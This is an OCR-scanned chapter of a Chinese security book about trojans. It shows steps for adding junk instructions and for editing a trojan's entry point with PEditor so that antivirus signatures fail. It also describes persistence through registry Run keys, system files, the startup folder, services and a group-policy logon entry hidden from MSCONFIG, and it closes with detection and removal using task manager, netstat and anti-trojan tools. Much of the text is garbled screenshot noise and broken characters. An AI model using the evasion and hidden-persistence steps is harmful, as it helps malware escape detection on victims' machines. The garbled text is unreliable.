的 主 程序 进行 加 花 了 ， 待 完成 后 即 可 看 到 
“添加 成 功 ” 提 示 框 。 单 击 “ 确 定 ” 按 
人 钮 ， 即 可 完成 加 花 操作 。 
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信息 x 


@ a 


Ew | 


[step 图 在 《超级 加 花 器 》 中 可 以 自己 添加 和 
保存 自 定义 的 花 指令 。 在 “超级 加 花 器 ” 
主 窗口 中 “添加 花 指 令 ” 栏 目 中 输入 花 指 
令 名 称 和 内 容 后 ， 下 
可 成 功 添 加 该 花 指 令 


信息 x 


@ rn 
Cw ] 


4.3.3 ”修改 木马 的 入 口 点 


由 于 一 般 的 杀毒 软件 都 会 检测 病毒 还 
原 后 的 代码 ， 而 且 一 般 都 把 代码 段 开 始 的 
前 10 字 节 作 为 特征 值 ， 因 此 ， 在 修改 入 口 
点 的 同时 ， 也 破坏 了 特征 码 ， 这 样 也 就 达 
到 免 杀 的 效果 。 利 用 PEditor 可 以 将 木马 的 
入 口 地 址 加 1 来 修改 入 口 点 ， 进 而 起 到 自我 
保护 的 功能 。 

使 用 PEditor 修 改 入 口 点 的 具体 操作 步 
sd 
运行 PEditor 程 序 ， 打 开 其 主 窗 口 。 


出 [PEdaor 1.7] yoda & Mo.D, 制 作 cao_cong 汉 化 x 
| 
文件 信息 文件 大 
AADg 机 品类 型 
销售 基 直 富 
时 间 日 其 标志: 
化 更 基 让 六 一 $it 
孝 报 其 外 「 | | 主教 
广 -一 一 和 
厂 一 一 ax 部 大 小 
请 集 大 小 -一 一 重建 程序 
头 部 大 小 和 
-到 ee 让 用 
文件 队列 关于 
子 尖 统 Bi 退出 
1 并 一 人文 下文 PE 


step 图 单 去 “浏览 ”按钮 ， 打 开 “ 选 择 你 要 
查看 的 文件 ”对 话 框 ， 在 其 中 选择 要 进行 


蛋 运 至 你 要 吉 丰 的 文件 x 
查找 范围 (): 。 | 站 新 建文 件 夫 了 本 汪 四 车 国 " 
处 MM 类 轩 大 小 
各 muma.ee E33 5 
< > 
文件 名 (IN [momaexe #7Ff(O) 

文 Hm}: 和 


step 图 单 击 “打开 ”按钮 ， 返 回 到 PEditor 
程序 主 窗口 ， 在 其 中 可 以 看 到 相关 文件 的 


| 由 [PEditor 17 ] yoda & Mo.D 制 作 cao_cong 汉 化 三 芭 
由 y 
压 符 栓 到 5 新建 文件 赤 wwa exe -537144 字 节 到 
文件 信息 文件 类 
入 点 7000 ”机 器 类 到 fre 任务 
镇 像 旬 址 50050” 节 数 parr 刷新 
标 分 划 节 
这 时 间 日 其 标志: FE 
司 选 头 部 
代码 基 址 [ooooioo0 符号 表 指 针 aaooooo ee 
数据 基 址 [oooniooo 符号 数 aaooooo 
镜像 大 小 [0067055 | 可 选 尖 部 大 小 : am 
头 部 大 小 [ooona55 | 特征 值 pe 重建 程序 
pA 到 ooo 人 
文件 队列 FE | | 者 a 
子 系统 Fi 节 表 上 a 
抬 称 的 夺标 关 各 痪 扣 本 上 以 次 得 更 信和 


[step 加 把 “入 口 点 ”文本 框 中 原 数 值 加 1 
后 ， 单 击 “ 应 用 更 改 ” 按 钮 ， 即 可 打开 
“XXX 此 文件 更 新 成 功 ” 的 提示 框 。 单 击 
“确定 ”按钮 ， 即 可 完成 修改 入 口 点 的 防 
特征 码 免 杀 设置 。 


四 
Ee E 
文件 信息 2 
入 吕 点 6700 ”| 机 器 类 型 Fi 任务 
镇 外 车 址 。 T000005]) | Ms 
分 天 季 
2 调试 加 中 中 上 
代码 基 直 | [iy Yepp.. 此 文件 更 新 成 功 1 PT 
孝 据 基 上 ono 。 
镜像 大 小 Fasmaal EE 
头 部 大 小 Faooaadl 二 
到 Pa 一 后 用 下 
文件 队列 Paaam | 关于 
子 系统 Fe 忆 素 EE a 
上 


4.4 木马 常见 的 启动 方式 


木马 的 启动 方式 可 谓 多 种 多 样 ， 通 过 
注册 表 启 动 、 通 过 system.ini 启 动 、 通 过 某 
些 特定 程序 启动 、 通 过 服务 甚至 驱动 启动 
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等 ， 真 是 防不胜防 。 其 实 ， 只 要 能 够 遏制 
住 木 马 不 让 它 启 动 ， 那 么 木马 就 没什么 用 
了 。 本 节 就 来 介绍 木马 的 各 种 启动 方式 ， 
然后 给 出 有 效 的 防御 对 策 ， 做 到 知己 知 彼 
百 战 不 列 。 


4.4.1 利用 注册 表 启 动 


关于 利用 注册 表 启 动 ， 大 家 都 比较 熟 
悉 ， 下 面 提醒 用 户 注意 几 个 注册 表 键 值 ， 
只 要 有 “run” 敏 感 字眼 ， 就 需要 注意 了 。 


~ 
轩 广 瑟 二 


x 
ma 日 S50 em WR 

全 EE 
| ge Ga 

大 son ecsz 


> 


< » le 
NEY CURRENT USER\ soimeare Microco tn Windows CurrentVerdion\Run 


HKEY LOCAL MACHINE\Software\ 
Microsoft\Windows\CurrentVersion\Run 

HKEY_ LOCAL MACHINE\Software\ 
Microsoft\Windows\CurrentVersion\RunOnce 

HKEY_ LOCAL MACHINE\Software\ 
Microsoft\Windows\CurrentVersion\ 
Runservices 

HKEY CURRENT USER\Software\ 
Microsoft\Windows\CurrentVersion\Run 

HKEY CURRENT USER\Software\ 
Microsoft\Windows\CurrentVersion\RunOonce 


4.4.2 ”利用 系统 文件 启动 


可 以 利用 的 文件 有 win.ini、system. 
ini、Autoexec.bat 和 Config.sys。 当 系统 启 
动 的 时 候 ， 上 述 这 些 文件 的 一 些 内 容 是 可 
以 随 着 系统 一 起 加 载 的 ， 从 而 可 以 被 木马 
利用 。 

用 文本 方式 打开 C:\Windows 下 面 的 
system.ini 文 件 ， 如 果 其 中 包括 一 些 RUN 或 
者 LOAD 等 字眼 ， 就 要 小 心 了 ， 很 可 能 是 木 
马 修改 了 这 些 系统 文件 来 实现 自 启动 。 同 
时 ， 其 他 的 几 个 所 述 文件 也 经 常 被 利用 ， 
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从 而 达到 开机 启动 的 目的 ， 希 望 读者 能 够 


4.4.3 利用 系统 启动 组 启动 


单 击 “ 开 始 ”按钮 ， 可 看 到 Windows 10 
的 启动 菜单 ， 如 下 图 所 示 ， 如 果 其 中 有 不 
明了 的 项 目 ， 很 可 能 就 是 木马 文件 。 


其 实 ， 这 个 启动 方式 是 在 “C:\Docu- 
ments and Settings\gillispie\ [开始 」 菜单 \ 
程序 \ 启 动 ”文件 夹 下 被 配置 的 ， 例 如 如 果 
当前 用 户 是 administrator， 那 么 这 个 文件 的 
路 径 就 是 “C:\Documents and Settings\Ad- 
ministrator\ [开始 」 菜单 \ 程 序 \ 启 动 "。 黑 
客 就 可 以 通过 向 这 个 文件 夹 中 写 入 木马 文 
件 或 其 快捷 方式 来 达到 自 启动 的 目的 ， 而 
它 对 应 的 注册 表 键 值 为 “Startup” ， 如 下 
图 所 示 。 
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HKEY CURRENT USER\Software\ 
Microsoft\Windows\CurrentVersion\ 
Explorer\Shell Folders 


4.4.4 利用 系统 服务 启动 

系统 要 正常 的 运行 ， 就 少不了 一 些 服 
务 ， 一 些 木马 会 通过 加 载 服务 来 达到 随 系 
统 启 动 的 目的 ， 这 时 用 户 可 以 通过 “控制 
面板 ”中 的 “管理 工具 ”下 的 “服务 ” 选 
项 来 关闭 服务 。 


对 于 一 些 高 级 用 户 ， 甚 至 可 以 通过 
CMD 命 令 来 删除 服务 。 

e@ net start 服务 名 (开启 服务 〉。 

@ ”net stop 服务 名 (关闭 服务 〉。 

使 用 net stop 命 令 成 功 关 闭 了 相关 服务 
的 操作 界面 ， 如 下 图 所 示 。 


丽 守 BR:CWINDOWS\system32\em. 一 口 x 


C: \Users\Administratornet stop server 
Server 入 


Server 服务 已 成 功 停止 。 


C: \Users\Administrator>~ 


4.4.5 利用 系统 组 策略 启动 


利用 系统 当中 的 组 策略 可 以 启动 木马 
程序 ， 具 体 的 操作 步骤 如 下 。 
[step 图 选择 “开始 ”一 “运行 ”菜单 项 ， 
在 打开 的 “运行 ”对 话 框 中 输入 gpedit.msc 
命令 。 


本 运行 X 


/到 。 Wndows 人 有 Fi 和 的 名 和 ,为 fs 和 人 应 四 床 
文件 夫 ， 广 莹 Imternet 到 源 . 


FO |9pedkmcd 


| 


单 击 “ 确 定 ” 按 钮 ， 打 开 “ 本 地 组 策 
略 编辑 器 ”窗口 ， 可 看 到 “本 地 计算 机 策 
略 ” 中 有 两 个 选项 : “计算 机 配置 ”与 “用 
户 配 置 ”， 展 开 “ 用 户 配置 ”一 “管理 模 
板 ” 一 “系统 ”一 “登录 ”选项 。 


双击 “在 用 户 登 录 时 运行 这 些 程序 ” 
子 项 ， 打 开 “ 在 用 户 登录 时 运行 这 些 程序 
属性 ”对 话 框 ， 义 选 “已 启用 ” 复 选 框 。 


RE x 


TRE pr) 


Om ES 
Oa) 
口 Emo 
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[Step 加 单 去 “显示 ”按钮 ， 弹 出 “显示 内 
容 ” 对 话 框 ， 在 “登录 时 运行 的 项 目 ” 下 
方 添加 运行 的 项 目 ， 单 击 “确定 ”按钮 ， 
即 可 完成 在 用 户 登 录 时 运行 那些 程序 。 


显示 内 容 口 x 


要 录 时 运行 的 项目 


值 
7 请 旭 文 件 天 we we 


确定 (0) 取消 (C) 


重新 启动 计算 机 ， 系 统 在 登录 时 就 会 

自动 启动 添加 的 程序 ， 如 果 刚 才 添 加 的 是 
木马 程序 ， 那 么 一 个 “隐形 ”木马 就 这 样 
诞生 了 。 
侈 提示 :由 于 用 这 种 方式 添加 的 自 启动 
程序 在 系统 的 “系统 配置 实用 程序 ”(MS- 
CONFIG) 中 是 找 不 到 的 ， 同 样 在 所 熟知 的 
注册 表 项 中 也 是 找 不 到 ， 所 以 非常 危险 。 

通过 这 种 方式 添加 的 自 启动 程序 虽 
然 被 记录 在 注册 表 中 ， 但 是 不 在 所 熟知 的 
注册 表 的 [HKEY_CURRENT_USER\Soft- 
ware\Microsoft\Windows\CurrentVersion\Run] 
项 和 [HKEY_LOCAL MACHINE\Soft- 
ware\Microsoft\Windows\CurrentVersion\Run] 
项 内 ， 而 是 在 注册 表 的 [HKEY_CURRENT_ 
USER\Software\Microsoft\Windows\Current- 
Version\Policies\ExplorerRun] 项 内 。 

如 果 用 户 怀疑 计算 机 被 种 了 “ 木 
马 ”， 可 是 又 找 不 到 它 在 哪儿 ， 建 议 到 注 


册 表 的 [HKEY_CURRENT_USER\Software\ 
Microsoft\Windows\CurrentVersion\Policies\ 
ExplorerRun] 项 中 找 找 ， 如 下 图 所 示 。 或 是 
进入 “本 地 组 策略 编辑 器 ”窗口 的 “在 用 
户 登 录 时 运行 这 些 程序 ”下 ， 看 看 有 没有 
启动 的 程序 。 
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WEY_CuRRENT_USERWokwarmyMicrorokiWrdowaicurraneverionyfoidieniEvpiorervun 


4.5.2 ”通过 进程 检测 木马 


由 于 木马 也 是 一 个 应 用 程序 ,一旦 
运行 ， 就 会 在 计算 机 系统 的 内 存 中 驻 留 进 
程 。 因此， 用 户 可 以 通过 系统 自 带 的 “ 任 
务 管理 器 ”来 检测 系统 中 是 否 存在 木马 进 
程 ， 具 体 的 操作 步骤 如 下 。 

[step 图 在 Windows 操 作 系统 中 ， 按 Ctrl+ 
Alt+Delete 组 合 键 ， 打 开 “ 任 务 管理 器 ” 
窗口 。 


4.5 查询 系统 中 的 木马 


当 计算 机 出 现 以 下 几 种 情况 时 ， 最 好 
查询 一 下 系统 是 否 中 了 木马 。 

(1) 突然 自己 打开 并 进入 某 个 陌生 网 站 。 

(2) 计算 机 在 正常 运行 的 过 程 中 突然 弹 
出 一 个 警告 框 ， 提 示 用 户 从 未 遇 到 的 问题 。 

(3) Windows 的 系统 配置 自动 被 更 改 ， 
如 屏幕 的 分 辩 率 、 时 间 和 日 期 、 声 音 大 
小 、 鼠 标 灵敏 度 、CD-ROM 的 自动 运行 配 
置 等 。 

(4) 硬盘 长 时 间 地 读 盘 ， 软 驱 灯 长 亮 不 
灭 ， 网 络 连接 及 鼠标 屏幕 出 现 异 常 现象 。 

(5) 系统 运行 缓慢 ， 计 算 机 被 自动 关 
闭 或 者 重启 ， 甚 至 出 现 死机 现象 。 

下 面 介 绍 几 种 常见 的 查询 系统 中 的 木 
马 方式 。 


4.5.1 通过 启动 文件 检测 木马 


一 旦 计算 机 中 了 木马 ， 则 在 开机 时 一 
般 都 会 自动 加 载 木 马 文件 ， 由 于 木马 的 隐 
蔽 性 比较 强 ， 在 启动 后 大 部 分 木马 都 会 更 
改 其 原来 的 文件 名 。 如 果 用 户 对 计算 机 的 
启动 文件 非常 熟悉 ， 则 可 以 从 Windows 操 作 
系统 自动 加 载 文 件 中 分 析 木 马 的 存在 并 清 
除 木 马 ， 这 种 方式 是 最 有 效 、 最 直接 的 检 
测 木 马 方式 。 但 是 ， 由 于 木马 自动 加 载 的 
方法 和 存放 的 位 置 比较 多 ， 对 于 初学 者 来 
说 ， 处 理 起 来 比较 有 难度 。 
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3 Es 二 -局 六 
sn EEC BEV 
ER le 55 好 有 二 Rn ip 有 Es 


Ne) 全 中 信人 


选择 “进程 ”选项 卡 ， 选 中 某 个 进 
程 并 右 击 ， 从 弹出 的 快捷 菜单 中 选择 相应 
的 菜单 项 ， 即 可 对 进程 进行 相应 的 管理 
操作 。 


Te Sm0) Ee 
三 全 应 用 而 实 D 生 疡 9 且 户 济 8 和 8 总 服务 


另外 ， 用 户 还 可 以 利用 进程 管理 软件 
来 检查 系统 进程 并 发 现 木 马 。 常 用 的 工具 
软件 是 “Windows 进 程 管理 器 ”， 该 软件 
可 以 更 全 面 地 对 进程 进行 管理 。 其 最 大 的 
特点 是 包含 了 几乎 全 部 的 Windows 系 统 进程 


和 大 量 的 常用 软件 进程 及 不 少 的 病毒 和 木 
马 进 程 。 

使 用 Windows 进 程 管理 器 查询 系统 中 木 
马 的 具体 操作 步骤 如 下 。 
[step 图 下 载 并 解压 缩 “Windows 进 程 管理 
器 ”软件 后 ， 可 看 到 其 中 包含 的 4 个 文件 。 


才 亿 三 访问 


Bm OneDrve 


a 县 preMgrene 
La 
局 国 ; 
Eb 
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[step 图 双击 “补丁 ”文件 夹 ， 打 开 “ 补 丁 ” 
文件 夹 ， 在 其 中 可 以 看 到 Windows 进 程 管理 
器 的 补丁 程序 和 补丁 说 明文 件 。 


是 1 上 蝇 是 = 1# 本 - D x 
3 页 斥 到 0 


天 快 于 访问 
力 PreMgrPorch exe RE 
] Ti 2 


me 国 = 
双击 补丁 应 用 程序 ， 打 开 “Windows 
进程 管理 器 补丁 程序 ”对 话 框 ， 在 其 中 显 
示 了 补丁 介绍 及 详细 信息 。 


| Windows 进程 管理 句 补丁 程序 x 
详细 信息 


regsvr32 /s WSystenRootW\system32\comct]32. 全 
emR。 tt 


re sys 
so oonfig TernService start= TD 


退出 程序 
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[step 园 单 去 “应 用 补丁 ”按钮 ， 即 可 应 用 补 
丁 程序 ， 并 弹出 “提示 ”对 话 框 ， 提 示 用 
户 补丁 应 用 成 功 。 


EE x 
6 补丁 应 用 成 功 1 


[step 图 单 去 “确定 ”按钮 ， 关 闭 “提示 ”对 
话 框 。 然 后 双击 Windows 进 程 管理 器 启动 程 
序 ， 打 开 “Windows 进 程 管理 器 ”窗口 。 其 
中 显示 了 系统 当前 正在 运行 的 所 有 进程 ， 
与 “任务 管理 器 ”窗口 中 的 进程 列表 是 完 
全 相同 的 。 


因 sran 全 ssed 司 nx 国 waBt 到 Xmze 固 W# @fiemh [Tm 
BE 2 EO WTC ~ 
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sR 
0 
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[Eee 图 在 列表 中 选择 一 个 进程 选项 后 ， 单 
击 “ 描 述 ” 按 钮 ， 即 可 看 到 该 进程 的 详细 


信息 。 
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step 国 单 去 “模块 ”按钮 ， 即 可 查看 该 进程 
的 进程 模块 。 
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step 国 在 进程 列表 中 右 击 某 个 进程 ， 在 其 中 
可 以 进行 结束 /暂停 进程 、 查 看 属性 、 删 除 
文件 等 操作 。 

人 


ET TE TT IT 全 


侈 提示 : 按 进程 的 安全 等 级 进行 了 区 分 。 

@ 黑色 表示 的 是 正常 进程 (正常 的 系统 或 
应 用 程序 进程 ， 安 全 )。 

@ 蓝 色 表示 可 疑 进程 容易 被 病毒 或 木马 
利用 的 正常 进程 ， 需 要 留心 ) 。 

人 @@ 红色 表示 病毒 & 木 马 进 程 ( 危 险 )。 


4.5.3 ”通过 网 络 连接 检测 木马 
木马 的 运行 通常 是 通过 网 络 连接 实现 


“的 ， 因 此， 用 户 可 以 通过 分 析 网 络 连接 来 


推测 木马 是 否 存在 ， 最 简单 的 办 法 是 利用 
Windows 自 带 的 Netstat 命 令 ， 具 体 的 操作 步 
又 如 下 。 

[se 加 右 击 “ 开 始 ” 按 钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “运行 ”选项 。 
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[Sep 图 在 弹出 的 对 话 框 中 ， 在 “打开 ”文本 
框 中 输入 cmd 命 令 。 


吾 运 5 x 


回 Windows 将 根据 你 所 寻 入 的 和 名称， 为 你 打开 相应 的 程序 . 
文件 夹 、 文 性 或 Internet 资源 


打开 (O): |emd| v 


CD ww | re 


EGG 国 单 去 “确定 ”按钮 ， 打 开 “ 命 令 提示 
Fe 


国 祝 RCWINDOWS\system32em. 一 D x | 


中 crosoft Windows [版 本 10.0， "中 ] | 
(c) 2018 MGcrosoft Corporation。 保 留 所 有 权利 。 


C:\Users\Administrator> 


step 轩 在 “命令 提示 符 ” 窗 口中 输入 
“netstat -a”， 按 Enter 键 ， 其 运行 结果 如 
下 图 所 示 。 


而 管理 &: CMWINDOWS\system32\emd.exe - netstat -a - OO x 


jicrosoft Windows [版 本 10.0.17134 3 | 
(c) 2013 了 crosoft Corporation。 保 留 所 有 权利 。 


[C:\Users\VAdministrator>netstat -a 


外 部 地 址 状态 
DESKTOP-RJKNIOC:0 


LISTENING 
DESETOP-RJENMOC:0 LISTENING 
DESKTOP-RJKNIOC:0 LISTENING 
DESKTOP-RJKNIOC:0 LISTENING 
DESKTOP-RJKNIOC:0 LISTENING 
DESKTOP-RJKNIOC:0 LISTENING 
DESKTOP-RJRNIOC:0 LISTENING 
DESKTOP-RJENNOC:O LISTENING 
DESKTOP-RJKNIOC:0 LISTENING 
DESKTOP-RJRNIOC:0 LISTENING 
DESKTOP-RJRNIOC:0 LISTENING 
DESKTOP-RJRNIOC:0 LISTENING 
DESKTOP-RJKNIOC:0 LISTENING 
DESETOP-RJENIOC:0 LISTENING 


DESKTOP-RJENNOC: LISTENING ~ 


侈 提示 :参数 “-a” 的 作用 是 显示 计算 机 
中 目前 所 有 处 于 监听 状态 的 端口 。 如 果 出 
现 不 明 端口 处 于 监听 状态 ， 而 目前 又 没有 
进行 任何 网 络 服务 的 操作 ， 则 在 监听 该 端 
口 的 很 可 能 是 木马 。 


4.6 “使 用 木马 清除 软件 清除 木马 


对 于 那些 识别 出 来 的 比较 了 解 的 木 
马 病毒 ， 可 以 使 用 手工 清除 的 方法 将 其 删 
除 ， 但 是 如 果 不 了 解 发 现 的 木马 病毒 ， 要 
想 确定 木马 的 名 称 、 入 侵 端口 、 隐 藏 位 置 
和 清除 方法 等 非常 困难 ， 这 时 就 需要 使 用 


木马 清除 软件 清除 木马 。 
4.6.1 使 用 金山 《贝壳 木马 专 杀 》 软 件 
清除 木马 


根据 云 安全 统计 数据 显示 ， 每 日 有 上 
百 万 用 户 机 器 被 新 木马 /其 他 病毒 感染 ， 其 
中 网 络 游戏 盗号 类 木马 占 80%。《 贝 壳 木 马 
专 杀 》 软 件 是 国内 首 款 专 为 网 游 防盗 号 量 
身 打造 的 、 完 全 免费 的 木马 专 杀 软件 ， 其 
安全 检测 采用 云 计 算 技术 ， 拥 有 庞大 的 云 
安全 数据 库 ， 能 在 Smin 内 快速 识别 新 木马 / 
其 他 病毒 ， 以 保证 系统 、 账 号 和 用 户 隐私 
的 安全 。 

使 用 金山 《贝壳 木马 专 杀 1.5》 软 件 清 
除 木 马 的 具体 操作 步骤 如 下 。 
下 载 并 安装 《贝克 木马 专 杀 1.5》 软 
件 ， 并 双击 其 快捷 图 标 ， 打 开 “ 贝 过 木马 
专 杀 ” 主 窗口 。 


9m ar" lke 


加 见 完 击 马 专 闹 15 -x83 .wise- 


于 全 岂可 上 杀人 内 趟 过 行 过 趟 可 扫 肝 请 上 站 - 开 如 查 和 - 


操 快 上 用 ( 振 涯 ) 。。 D3。 Bs 有 9 洛 


到 人 提示 云 呈 全 检 训 十 马 | 
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> 由 于 及 网 > 六 注 守 区 


[step 图 选中 “快速 扫描 (推荐 ) ” 单 选 按 
钮 后 ， 单 击 “ 开 始 查 杀 ”按钮 ， 即 可 开始 
查 杀 病毒 。 在 “ 云 安全 检测 ”选项 卡 下 ， 
即 可 看 到 信任 文件 、 无 威胁 文件 、 未 知 文 
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件 、 木 马 / 病 毒 等 类 型 文件 的 个 数 。 
Boss wm 


人 


MI RY 


马 病 毒 文件 ， 将 会 弹出 “发 现 木马 ”对 话 
框 ， 在 其 中 显示 森马 的 名 称 、 路 径 等 信 
息 。 用 户 可 根据 实际 需要 选择 “清除 ”或 
“ 跳 过 ”， 这 里 单 击 “ 清 除 ” 按 钮 ， 即 可 
清除 该 木马 文件 。 

FFE- [二 | 


©@ snts 


名 车 :bojanpow pewnow .41286 
建议 ;请 丰 拉 洁 障 


Vastoma7s 


口 总 是 二 8 换 作 


[Sep 国 如 果 想 查看 木马 的 详细 信息 ， 则 可 以 
在 “发 现 木 马 ” 对 话 框 中 单 击 “ 去 病毒 百 
科 查 看 详情 ” 超 链接 ， 打 开 “ 贝 过 安全 文 
件 百科 ”窗口 ， 在 其 中 即 可 看 到 该 病毒 文 
件 的 详细 信息 。 
局 RE 效 可 


© Server.exe 
机 本 程序 ，trejarpewpswwew 41295 


em: 


eA 20 
四 忆 和 序 * 建 潜 人 用 内 木马 才 革 工 内行 流 辽 + 


直下 本 厅 。 相 区 检 放量 两 代 在 电 的 中 ， 有 外 用 六 


入 用 户 的 于 后 并 克 莹 ， 角 向 其 禾 社 汪 用 户 的 信忠， 而 
,FP 性 和。 本 所 术 不 、 时 要 工 上 入 上 主 直入 ， 即 
“的 窟 及， 布 于 才 了 有 全 通 这 直入 太行 科 抽 其 忠和 杂 出 闪 - 


step 图 待 扫描 完成 后 ， 打 开 “ 扫 描 报告 ”对 
话 框 ， 在 其 中 可 查看 发 现 的 木马 病毒 数 、 
扫描 所 用 的 时 间 及 扫描 的 文件 数 等 信息 。 
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[Be 图 在 扫描 的 过 程 中 ， 如 果 发 现存 在 木 比 
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加 扫 诗 失 告 a 
二 六 充 成 , 木马 /病毒 已 全 部 清除 

发 现 木马 /病毒 : 2 个 ,已 全 部 清除 

未 知 文件 : 1 个 

扫描 时 间 : 2 分 19 秒 

扫 扩 文件 : 8373 个 


友情 提示 : A 由 贝壳 云 安全 进行 快速 分 
step 较 单 去 “关闭 ”按钮 返回 到 “贝壳 木马 
专 杀 1.5” 主 界面 并 选择 “木马 /病毒 ”选项 
卡 ， 在 其 中 即 可 看 到 已 经 清除 的 木马 病毒 
文件 列表 。 
Ws 3 一 血本 号 -有 六 吕 一 


SEE 和 5 人 ID73T 。。 不/ 清 检 ; 2， 忆 证 


OFh yr- Ei 
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池 4.6.2 ”使 用 木马 间谍 清除 工具 清除 木马 


Spyware Doctor 是 一 款 非 常 先进 的 间谍 
软件 、 广 告 软件 清除 工具 ， 可 以 检查 并 从 
计算 机 中 移 除 间谍 软件 、 广 告 软件 、 木 马 
程序 、 键 盘 记 录 器 和 追踪 威胁 等 。 

使 用 Spyware Doctor 清 除 木 马 间 谍 的 具 
体操 作 步 又 如 下 。 
下 载 并 安装 Spyware Doctor 后 ， 双 
击 桌 面 上 的 Spyware Doctor 图 标 ， 打 开 
Spyware Doctor 窗 口 。 


FE Tools 
四 Spyware Doctor Snrt tpte 昌 下 
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系统 状 志 : 应 注意 
© Fert 


EBEE 
上 


EL 玉生 本 | 


step 园 在 IntelliGuard 选 项 卡 中 单 击 “ 单 


击 激活 IntelliGuard” 和 链接 ， 
IntelliGuard。 


即 可 激活 
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在 Spyware Doctor 窗 口中 单 击 Browser 
Guard 选 项 ， 打 开 Browser Guard 窗 口 ， 在 其 
中 设置 Browser Guard 参 数 ， 从 而 保护 浏览 
器 设置 不 被 恶意 变更 ， 以 防止 浏览 器 被 恶 
意 添加 插件 。 
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PC Tools 
Spyware Doctor ( 带 防毒 组 件 包 ) 
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单 击 File Guard 选 项 ， 打 开 File Guard 
窗口 ， 在 其 中 设置 File Guard 参 数 ， 从 而 监 
控 系统 中 的 所 有 文件 ， 以 防止 被 入 侵 。 
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Spyware Doctor ( 带 防毒 组 件 包 ) 
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[sep 图 单 去 Netword Guard 选 项 ， 打 开 
Netword Guard 窗 口 ， 在 其 中 设置 Netword 
Guard 参 数 ， 以 阻止 对 网 络 设置 的 恶意 更 
改 ， 使 得 威胁 软件 停止 拦截 网 路 连接 。 


| Pc Tools 


和 Spyware Doctor ( 带 防 帮 组件 包 ) 


IntelliGuard 保护 


二 
| 
EE 信 … 
| 雾 -ee 
bain 回 Process Guard Bib 
er 
-i 
起 一 一 有 er 
[es 
全 ER 
step 图 单 击 Process Guard 选 项 ， 打 开 Process 


Guard 窗 口 ， 在 其 中 设置 Process Guard 参 
数 ， 和光 的 意 进程 。 


IntelliGuard 保护 


-- reewss Geerd - 注 活 
aa | @ vee 
BE 信 …-， 
IIR 窟 Network Guard 
设置 加 Process Guard 
转 = 
罗 mntoee Gand 
岛 Coooe Guard 
step 回 单 击 Startup Guard 选 项 ， 打 开 Startup 
Guard 窗 口 ， 在 其 中 设置 Startup Guard 参 


数 ， 以 检测 并 阻止 恶意 应 用 软件 在 系统 中 
的 配置 并 自动 启动 。 


对 spyware Doctor ( 带 防 者 组 件 包 ) 


Intelliguard 保护 


姑 sam ionicne EE 
Bars | @ we 
Ea ， 一 
久 - 一 ~- 
本 | ee 
人 
同一 
区 ] eekie comrd 
zy ne 
step 图 单 去 Immunizer Guard 选 项 ， 打 开 


Immunizer Guard 窗 口 ， 在 其 中 查看 Immunizer 
Guard 参 数 ， 以 防御 亦 入 计算 机 中 ActiveX 型 
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PC Tools 
Spyware Doctor ( 带 防 毒 组 件 包 ) 


< 二 


Intellicuard 保护 

| 

Be i 
EE 信 .- 一 ae 

骨 > 

In 禄 esp ET 

症 国 me 
可 Sartsp cuard 
2 ai Guond 
号 relie Guard 


step 图 单 击 Cookie Guard 选 项 ， 打 开 Cookie 
Guard 窗 口 ， 在 其 中 设置 Cookie Guard 参 数 ， 
入 机 入 下 生生 在 下 吉 生 全 


pC Te 
ee ee) 


lntelliGuard 保护 


ws 


Sa nls 
Sous | @ ween mana mwewm 
E 7 一 
田 ein ao pore 
多 mr be Tr 
tm 
a i Ep 
回 tsa 
Ea eup eard UR 
ee 
EE (Coote Goard 
全 一 一 


单 击 Email Guard 选 项 ， 打 开 Email 
Guard 窗 口 ， 在 其 中 设置 Email Guard 参 数 ， 
以 对 收发 的 所 有 电子 邮件 中 的 附件 进行 扫 
描 和 查 杀 。 


卫 Spyware Doctor ( 带 防毒 组 件 包 ) 
lntelliGuard 保护 
ac i 
2 0 Coin i 
EY Fo aa oue 上 916 
Co 
In 器 ~ ST, 10F3 PIE Wi 
| wee hme 
] Er 
本 mon 
an 
> mnaer Gosrd 
Danae 
起 一 一 het 
Js 


[step 图 单 去 Site Guard 选 项 ， 打 开 Site Guard 
窗口 ， 在 其 中 设置 Site Guard 参 数 ， 以 监视 
并 拦截 潜在 恶意 站 点 的 访问 。 

[step 图 单 去 Keylogger Guard 选 项 ， 打 开 
Keylogger Guard 窗 口 ， 在 其 中 设置 
Keylogger Guard 参 数 ， 以 监视 并 阻止 所 有 
能 够 记录 按键 和 个 人 信息 的 Keylogger 恶 意 
程序 。 
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PC we 二 二 


step 固 在 等 待 扫描 完毕 后 ， 就 会 弹出 “扫描 


ed a mone 
于 | 恩 日 


iD 才 志 
MT 
A 
sah 
友 Er 
Er 
ree ET 
-| 
@ mm a Ex 


Behavior Guard 窗 口 ， 在 其 中 设置 Behavior 
Guard 参 数 ， 以 检测 出 计算 机 中 的 病毒 、 间 
谍 软 件 、 蠕 虫 、 木 马 程 序 和 其 他 恶意 软件 
的 攻击 。 


( 带 防毒 组 件 包 ) 


bes ee 


Step 图 单 击 “ 立 即 扫 描 ” 按 钮 ， 即 可 开始 对 
选 定 的 扫描 范围 进行 扫描 。 
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摘要 ”对 话 框 。 单 击 “ 完 成 ”按钮 ， 即 可 
完成 对 计算 机 的 扫描 。 


扫 所 的 要 
BV ee 


从 的 宇内 有 ; 


un 


4.7 ”实战 演练 
实战 演练 1 一 一 在 任务 管理 器 中 结束 木马 
进程 

进程 是 指正 在 运行 的 程序 实体 ， 并 且 
包括 这 个 运行 的 程序 中 占据 的 所 有 系统 资 
源 ， 如 果 自 己 的 计算 机 运行 速度 突然 慢 了 
下 来 ， 就 需要 到 “任务 管理 器 ”窗口 当中 
查看 一 下 是 否 有 木马 病毒 程序 正在 后 台 运 
行 。 在 “任务 管理 器 ”窗口 中 结束 木马 进 
程 的 具体 操作 步骤 如 下 。 
[step 轩 按键 盘 上 的 Ctrl+AlttDelete 组 合 键 ， 
打开 “任务 管理 器 ”界面 。 
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[step 图 单 击 “任务 管理 器 ”选项 ， 打 开 “ 任 ET 
务 管理 器 ”窗口 ， 选 择 “ 进 程 ” 选 项 卡 ， ™ ls a 
即 可 看 到 本 机 中 开启 的 所 有 进程 。 弱 aaaee 


同人 扩 祝 8 


- DO x 文 HE 庙 BE# (exe) 
文件 由 运 硕 (O) 查看 ( 
Brindicator 
进程 性 能 应 用 历史 记录 启动 用 户 详细 信息 服务 
| 11% 58% 0% 0% 位: CAProgram Fles 85)\BrownyInd\Brother 
SS Es 一 py 大 4 179 MB (1885.184 字 司 ) 
应 用 (外 古 用 = 司 。。 130 MB (1868.255 闻 可 ) 
》 后 360 安 全 浏 洛 器 


》 转 Micesokword 
